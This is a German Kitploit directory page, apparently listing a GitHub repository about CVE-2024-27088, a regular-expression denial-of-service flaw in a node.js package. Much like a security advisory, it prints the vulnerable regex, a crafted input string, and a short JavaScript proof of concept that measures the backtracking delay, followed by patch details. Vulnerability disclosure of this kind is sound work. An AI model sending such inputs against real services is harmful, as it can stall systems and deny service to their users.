Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-27088 — redos | Kitploit
Tools/GitHubGitHub/200101whoami/cve-2024-27088
Statische AnalyseSchwachstellenanalyseCode-AnalysePapers & ForschungLernen & Bildung
GitHub200101whoami/cve-2024-27088

CVE-2024-27088

redos

Repository anzeigen
10vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-27088

Schwachstellenübersicht

  • CVE-2024-27088

  • Feb 26, 2024

  • ReDoS im node.js-Paket

  • Als Teil des rebob-Projekts

Schwachstellenbeschreibung

github advisories

/^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/

Diese Schwachstelle kann ausgenutzt werden, wenn ein Ungleichgewicht in den Klammern vorliegt, was zu übermäßigem Backtracking und in der Folge zu einer erheblichen Erhöhung der CPU-Last und der Verarbeitungszeit führt. Diese Schwachstelle kann mit der folgenden Eingabe ausgelöst werden:

'function{' + 'n'.repeat(31) + '){'

Hier ist ein einfacher PoC-Code, der das Problem demonstriert:

const protocolre = /^\sfunction\s([\0-')-\uffff]+)\s(([\0-(-\uffff]))\s*{/;

const startTime = Date.now();
const maliciousInput = 'function{' + 'n'.repeat(31) + '){'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

Auswirkungen

Das Übergeben von Funktionen mit sehr langen Namen oder komplexen Standardargumentnamen an function#copy oder function#toStringTokens kann das Skript zum Stillstand bringen.

Patches Behoben mit 3551cdd und a52e957 Veröffentlicht mit v0.10.63

Workarounds Es gibt keine wirkliche Problemumgehung, außer die Verwendung der oben genannten Dienstprogramme zu vermeiden.

issue target package

Tool herunterladen